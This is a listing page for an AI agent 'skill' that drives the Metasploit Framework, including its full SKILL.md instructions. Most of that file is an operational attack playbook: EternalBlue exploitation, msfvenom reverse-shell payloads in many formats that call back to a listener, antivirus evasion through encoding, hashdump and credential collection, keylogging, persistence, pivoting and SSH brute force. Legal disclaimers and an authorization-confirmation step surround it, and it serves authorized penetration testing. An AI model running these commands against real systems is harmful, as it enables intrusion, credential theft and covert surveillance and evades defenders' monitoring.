metasploit-framework
⚠️ AUTHORIZED USE ONLY > This skill is for educational purposes or authorized security assessments only. > You must have explicit, written permission from the system owner before using this tool. > Misuse of this tool is illegal and strictly prohibited.
About this skill
This AI agent skill provides an interface to the robust Metasploit Framework, a world-renowned open-source penetration testing and exploit development platform. It enables an AI agent to perform various stages of ethical hacking, including reconnaissance, vulnerability scanning, exploitation of identified weaknesses, and post-exploitation operations. The skill is designed to assist security professionals in conducting thorough security assessments, red teaming exercises, and advanced cybersecurity education. **Crucially, the use of this skill is strictly limited to explicitly authorized contexts.** This includes educational labs, research environments, or security assessments conducted with prior written permission from the system owner, to prevent misuse, ensure legal compliance, and adhere to ethical hacking principles. Misuse of this tool is illegal and strictly prohibited.
Best use case
**Authorized Penetration Testing**: Assisting security teams in conducting authorized penetration tests against their own infrastructure or client systems with explicit, written consent. **Vulnerability Research and Validation**: An AI agent can utilize this skill to validate known vulnerabilities or research new exploit techniques in a controlled, isolated laboratory environment. **Cybersecurity Education and Training**: Providing a hands-on, ethical learning environment for students and professionals to understand offensive security tactics under strict supervision. **Automated Security Assessment**: Integrating into CI/CD pipelines for automated, consented security checks against staging or development environments.
⚠️ AUTHORIZED USE ONLY > This skill is for educational purposes or authorized security assessments only. > You must have explicit, written permission from the system owner before using this tool. > Misuse of this tool is illegal and strictly prohibited.
Identification and successful exploitation of vulnerabilities within an authorized target system in a controlled manner. Establishment of command-and-control sessions (e.g., Meterpreter) on vulnerable targets within a controlled environment. Detailed reports on identified weaknesses, successful penetration paths, and potential mitigation strategies. Enhanced understanding of system vulnerabilities and exploitation techniques through practical application.
Practical example
Example input
```json
{
"skill": "metasploit-framework",
"action": "orchestrate_attack_sequence",
"parameters": {
"target": "192.168.1.100",
"scope": "initial_reconnaissance_and_vulnerability_scan",
"exploit_strategy": "attempt_known_vulnerabilities_based_on_scan_results",
"authorization_status": "explicitly_authorized_for_pentest_on_test_lab"
}
}
```Example output
```json
{
"skill": "metasploit-framework",
"status": "success",
"results": {
"reconnaissance_status": "completed",
"vulnerabilities_found": [
{"cve_id": "CVE-2017-0143", "description": "SMBv1 RCE (EternalBlue)", "severity": "critical"},
{"cve_id": "CVE-2020-0796", "description": "SMBGhost (Windows SMB RCE)", "severity": "high"}
],
"exploit_attempts": [
{
"exploit_module": "exploit/windows/smb/ms17_010_eternalblue",
"target": "192.168.1.100",
"status": "successful",
"session_id": 1,
"session_type": "meterpreter"
}
],
"post_exploitation_suggestions": ["migrate_process", "dump_credentials", "escalate_privileges"],
"disclaimer": "All actions performed under explicit authorization for educational/assessment purposes."
}
}
```When to use this skill
- When you possess explicit, written permission from the owner of the target system to perform security assessments.
- In a sandboxed, isolated lab environment strictly for educational purposes, vulnerability research, or exploit development.
- As an integral part of an authorized red team exercise with clearly defined scope, rules of engagement, and legal agreements.
- When conducting internal security audits on systems that you legally own and control.
When not to use this skill
- Without explicit, written permission from the system owner for any target, regardless of intent.
- For any illegal or unauthorized activities, including gaining unauthorized access to systems or data.
- Against production systems without a comprehensive risk assessment, prior consent, and a clear rollback plan.
- If you are unsure of the legal implications, ethical boundaries, or potential impact of its use.
Installation
Claude Code / Cursor / Codex
Manual Installation
- Download SKILL.md from GitHub
- Place it in
.claude/skills/metasploit-framework/SKILL.mdinside your project - Restart your AI agent — it will auto-discover the skill
How metasploit-framework Compares
| Feature / Agent | metasploit-framework | Standard Approach |
|---|---|---|
| Platform Support | Claude | Limited / Varies |
| Context Awareness | High | Baseline |
| Installation Complexity | medium | N/A |
Frequently Asked Questions
What does this skill do?
⚠️ AUTHORIZED USE ONLY > This skill is for educational purposes or authorized security assessments only. > You must have explicit, written permission from the system owner before using this tool. > Misuse of this tool is illegal and strictly prohibited.
Which AI agents support this skill?
This skill is designed for Claude.
How difficult is it to install?
The installation complexity is rated as medium. You can find the installation instructions above.
Where can I find the source code?
You can find the source code on GitHub using the link provided at the top of the page.
Related Guides
AI Agents for Coding
Browse AI agent skills for coding, debugging, testing, refactoring, code review, and developer workflows across Claude, Cursor, and Codex.
Best AI Skills for Claude
Explore the best AI skills for Claude and Claude Code across coding, research, workflow automation, documentation, and agent operations.
ChatGPT vs Claude for Agent Skills
Compare ChatGPT and Claude for AI agent skills across coding, writing, research, and reusable workflow execution.
SKILL.md Source
# Metasploit Framework > **⚠️ AUTHORIZED USE ONLY** > This skill is for educational purposes or authorized security assessments only. > You must have explicit, written permission from the system owner before using this tool. > Misuse of this tool is illegal and strictly prohibited. ## Purpose Leverage the Metasploit Framework for comprehensive penetration testing, from initial exploitation through post-exploitation activities. Metasploit provides a unified platform for vulnerability exploitation, payload generation, auxiliary scanning, and maintaining access to compromised systems during authorized security assessments. ## Prerequisites ### Required Tools ```bash # Metasploit must already be installed before using this skill. # Kali Linux usually ships with it preinstalled. msfconsole --version ``` Installation varies by operating system and package source. Follow your platform's documented package-manager or vendor installation process before using this skill. Do not rely on an unpinned remote installer script from inside this skill. If you want database-backed features such as workspace tracking, initialize `msfdb` using the instructions for your local installation. This skill assumes Metasploit is already available and does not require `sudo`, `systemctl`, or other privileged host-level setup steps. ### Required Knowledge - Network and system fundamentals - Understanding of vulnerabilities and exploits - Basic programming concepts - Target enumeration techniques ### Required Access - Written authorization for testing - Network access to target systems - Understanding of scope and rules of engagement Before running exploit modules, ask the user to confirm the exact target host, scope, and authorization state. ## Outputs and Deliverables 1. **Exploitation Evidence** - Screenshots and logs of successful compromises 2. **Session Logs** - Command history and extracted data 3. **Vulnerability Mapping** - Exploited vulnerabilities with CVE references 4. **Post-Exploitation Artifacts** - Credentials, files, and system information ## Core Workflow ### Phase 1: MSFConsole Basics Launch and navigate the Metasploit console: ```bash # Start msfconsole msfconsole # Quiet mode (skip banner) msfconsole -q # Basic navigation commands msf6 > help # Show all commands msf6 > search [term] # Search modules msf6 > use [module] # Select module msf6 > info # Show module details msf6 > show options # Display required options msf6 > set [OPTION] [value] # Configure option msf6 > run / exploit # Execute module msf6 > back # Return to main console msf6 > exit # Exit msfconsole ``` ### Phase 2: Module Types Understand the different module categories: ```bash # 1. Exploit Modules - Target specific vulnerabilities msf6 > show exploits msf6 > use exploit/windows/smb/ms17_010_eternalblue # 2. Payload Modules - Code executed after exploitation msf6 > show payloads msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp # 3. Auxiliary Modules - Scanning, fuzzing, enumeration msf6 > show auxiliary msf6 > use auxiliary/scanner/smb/smb_version # 4. Post-Exploitation Modules - Actions after compromise msf6 > show post msf6 > use post/windows/gather/hashdump # 5. Encoders - Obfuscate payloads msf6 > show encoders msf6 > set ENCODER x86/shikata_ga_nai # 6. Nops - No-operation padding for buffer overflows msf6 > show nops # 7. Evasion - Bypass security controls msf6 > show evasion ``` ### Phase 3: Searching for Modules Find appropriate modules for targets: ```bash # Search by name msf6 > search eternalblue # Search by CVE msf6 > search cve:2017-0144 # Search by platform msf6 > search platform:windows type:exploit # Search by type and keyword msf6 > search type:auxiliary smb # Filter by rank (excellent, great, good, normal, average, low, manual) msf6 > search rank:excellent # Combined search msf6 > search type:exploit platform:linux apache # View search results columns: # Name, Disclosure Date, Rank, Check (if it can verify vulnerability), Description ``` ### Phase 4: Configuring Exploits Set up an exploit for execution: ```bash # Select exploit module msf6 > use exploit/windows/smb/ms17_010_eternalblue # View required options msf6 exploit(windows/smb/ms17_010_eternalblue) > show options # Set target host msf6 exploit(...) > set RHOSTS 192.168.1.100 # Set target port (if different from default) msf6 exploit(...) > set RPORT 445 # View compatible payloads msf6 exploit(...) > show payloads # Set payload msf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_tcp # Set local host for reverse connection msf6 exploit(...) > set LHOST 192.168.1.50 msf6 exploit(...) > set LPORT 4444 # View all options again to verify msf6 exploit(...) > show options # Check if target is vulnerable (if supported) msf6 exploit(...) > check # Execute exploit msf6 exploit(...) > exploit # or msf6 exploit(...) > run ``` ### Phase 5: Payload Types Select appropriate payload for the situation: ```bash # Singles - Self-contained, no staging windows/shell_reverse_tcp linux/x86/shell_bind_tcp # Stagers - Small payload that downloads larger stage windows/meterpreter/reverse_tcp linux/x86/meterpreter/bind_tcp # Stages - Downloaded by stager, provides full functionality # Meterpreter, VNC, shell # Payload naming convention: # [platform]/[architecture]/[payload_type]/[connection_type] # Examples: windows/x64/meterpreter/reverse_tcp linux/x86/shell/bind_tcp php/meterpreter/reverse_tcp java/meterpreter/reverse_https android/meterpreter/reverse_tcp ``` ### Phase 6: Meterpreter Session Work with Meterpreter post-exploitation: ```bash # After successful exploitation, you get Meterpreter prompt meterpreter > # System Information meterpreter > sysinfo meterpreter > getuid meterpreter > getpid # File System Operations meterpreter > pwd meterpreter > ls meterpreter > cd C:\\Users meterpreter > download file.txt /tmp/ meterpreter > upload /tmp/tool.exe C:\\ # Process Management meterpreter > ps meterpreter > migrate [PID] meterpreter > kill [PID] # Networking meterpreter > ipconfig meterpreter > netstat meterpreter > route meterpreter > portfwd add -l 8080 -p 80 -r 10.0.0.1 # Privilege Escalation meterpreter > getsystem meterpreter > getprivs # Credential Harvesting meterpreter > hashdump meterpreter > run post/windows/gather/credentials/credential_collector # Screenshots and Keylogging meterpreter > screenshot meterpreter > keyscan_start meterpreter > keyscan_dump meterpreter > keyscan_stop # Shell Access meterpreter > shell C:\Windows\system32> whoami C:\Windows\system32> exit meterpreter > # Background Session meterpreter > background msf6 exploit(...) > sessions -l msf6 exploit(...) > sessions -i 1 ``` ### Phase 7: Auxiliary Modules Use auxiliary modules for reconnaissance: ```bash # SMB Version Scanner msf6 > use auxiliary/scanner/smb/smb_version msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.0/24 msf6 auxiliary(...) > run # Port Scanner msf6 > use auxiliary/scanner/portscan/tcp msf6 auxiliary(...) > set RHOSTS 192.168.1.100 msf6 auxiliary(...) > set PORTS 1-1000 msf6 auxiliary(...) > run # SSH Version Scanner msf6 > use auxiliary/scanner/ssh/ssh_version msf6 auxiliary(...) > set RHOSTS 192.168.1.0/24 msf6 auxiliary(...) > run # FTP Anonymous Login msf6 > use auxiliary/scanner/ftp/anonymous msf6 auxiliary(...) > set RHOSTS 192.168.1.100 msf6 auxiliary(...) > run # HTTP Directory Scanner msf6 > use auxiliary/scanner/http/dir_scanner msf6 auxiliary(...) > set RHOSTS 192.168.1.100 msf6 auxiliary(...) > run # Brute Force Modules msf6 > use auxiliary/scanner/ssh/ssh_login msf6 auxiliary(...) > set RHOSTS 192.168.1.100 msf6 auxiliary(...) > set USER_FILE /usr/share/wordlists/users.txt msf6 auxiliary(...) > set PASS_FILE /usr/share/wordlists/rockyou.txt msf6 auxiliary(...) > run ``` ### Phase 8: Post-Exploitation Modules Run post modules on active sessions: ```bash # List sessions msf6 > sessions -l # Run post module on specific session msf6 > use post/windows/gather/hashdump msf6 post(windows/gather/hashdump) > set SESSION 1 msf6 post(...) > run # Or run directly from Meterpreter meterpreter > run post/windows/gather/hashdump # Common Post Modules # Credential Gathering post/windows/gather/credentials/credential_collector post/windows/gather/lsa_secrets post/windows/gather/cachedump post/multi/gather/ssh_creds # System Enumeration post/windows/gather/enum_applications post/windows/gather/enum_logged_on_users post/windows/gather/enum_shares post/linux/gather/enum_configs # Privilege Escalation post/windows/escalate/getsystem post/multi/recon/local_exploit_suggester # Persistence post/windows/manage/persistence_exe post/linux/manage/sshkey_persistence # Pivoting post/multi/manage/autoroute ``` ### Phase 9: Payload Generation with msfvenom Create standalone payloads: ```bash # Basic Windows reverse shell msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe # Linux reverse shell msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o shell.elf # PHP reverse shell msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.php # Python reverse shell msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.py # PowerShell payload msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f psh -o shell.ps1 # ASP web shell msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f asp -o shell.asp # WAR file (Tomcat) msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f war -o shell.war # Android APK msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -o shell.apk # Encoded payload (evade AV) msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe # List available formats msfvenom --list formats # List available encoders msfvenom --list encoders ``` ### Phase 10: Setting Up Handlers Configure listener for incoming connections: ```bash # Manual handler setup msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST 192.168.1.50 msf6 exploit(multi/handler) > set LPORT 4444 msf6 exploit(multi/handler) > exploit -j # The -j flag runs as background job msf6 > jobs -l # When payload executes on target, session opens [*] Meterpreter session 1 opened # Interact with session msf6 > sessions -i 1 ``` ## Quick Reference ### Essential MSFConsole Commands | Command | Description | |---------|-------------| | `search [term]` | Search for modules | | `use [module]` | Select a module | | `info` | Display module information | | `show options` | Show configurable options | | `set [OPT] [val]` | Set option value | | `setg [OPT] [val]` | Set global option | | `run` / `exploit` | Execute module | | `check` | Verify target vulnerability | | `back` | Deselect module | | `sessions -l` | List active sessions | | `sessions -i [N]` | Interact with session | | `jobs -l` | List background jobs | | `db_nmap` | Run nmap with database | ### Meterpreter Essential Commands | Command | Description | |---------|-------------| | `sysinfo` | System information | | `getuid` | Current user | | `getsystem` | Attempt privilege escalation | | `hashdump` | Dump password hashes | | `shell` | Drop to system shell | | `upload/download` | File transfer | | `screenshot` | Capture screen | | `keyscan_start` | Start keylogger | | `migrate [PID]` | Move to another process | | `background` | Background session | | `portfwd` | Port forwarding | ### Common Exploit Modules ```bash # Windows exploit/windows/smb/ms17_010_eternalblue exploit/windows/smb/ms08_067_netapi exploit/windows/http/iis_webdav_upload_asp exploit/windows/local/bypassuac # Linux exploit/linux/ssh/sshexec exploit/linux/local/overlayfs_priv_esc exploit/multi/http/apache_mod_cgi_bash_env_exec # Web Applications exploit/multi/http/tomcat_mgr_upload exploit/unix/webapp/wp_admin_shell_upload exploit/multi/http/jenkins_script_console ``` ## Constraints and Limitations ### Legal Requirements - Only use on systems you own or have written authorization to test - Document all testing activities - Follow rules of engagement - Report all findings to appropriate parties ### Technical Limitations - Modern AV/EDR may detect Metasploit payloads - Some exploits require specific target configurations - Firewall rules may block reverse connections - Not all exploits work on all target versions ### Operational Security - Use encrypted channels (reverse_https) when possible - Clean up artifacts after testing - Avoid detection by monitoring systems - Limit post-exploitation to agreed scope ## Troubleshooting | Issue | Solutions | |-------|-----------| | Database not connected | Run `sudo msfdb init`, start PostgreSQL, then `db_connect` | | Exploit fails/no session | Run `check`; verify payload architecture; check firewall; try different payloads | | Session dies immediately | Migrate to stable process; use stageless payload; check AV; use AutoRunScript | | Payload detected by AV | Use encoding `-e x86/shikata_ga_nai -i 10`; use evasion modules; custom templates | ## When to Use This skill is applicable to execute the workflow or actions described in the overview.
Related Skills
fix-review
Verify fix commits address audit findings without new bugs
ffuf-web-fuzzing
Expert guidance for ffuf web fuzzing during penetration testing, including authenticated fuzzing with raw requests, auto-calibration, and result analysis
framework-migration-deps-upgrade
You are a dependency management expert specializing in safe, incremental upgrades of project dependencies. Plan and execute dependency updates with minimal risk, proper testing, and clear migration pa
framework-migration-code-migrate
You are a code migration expert specializing in transitioning codebases between frameworks, languages, versions, and platforms. Generate comprehensive migration plans, automated migration scripts, and
data-quality-frameworks
Implement data quality validation with Great Expectations, dbt tests, and data contracts. Use when building data quality pipelines, implementing validation rules, or establishing data contracts.
backtesting-frameworks
Build robust, production-grade backtesting systems that avoid common pitfalls and produce reliable strategy performance estimates.
nft-standards
Master ERC-721 and ERC-1155 NFT standards, metadata best practices, and advanced NFT features.
nextjs-app-router-patterns
Comprehensive patterns for Next.js 14+ App Router architecture, Server Components, and modern full-stack React development.
new-rails-project
Create a new Rails project
networkx
NetworkX is a Python package for creating, manipulating, and analyzing complex networks and graphs.
network-engineer
Expert network engineer specializing in modern cloud networking, security architectures, and performance optimization.
nestjs-expert
You are an expert in Nest.js with deep knowledge of enterprise-grade Node.js application architecture, dependency injection patterns, decorators, middleware, guards, interceptors, pipes, testing strategies, database integration, and authentication systems.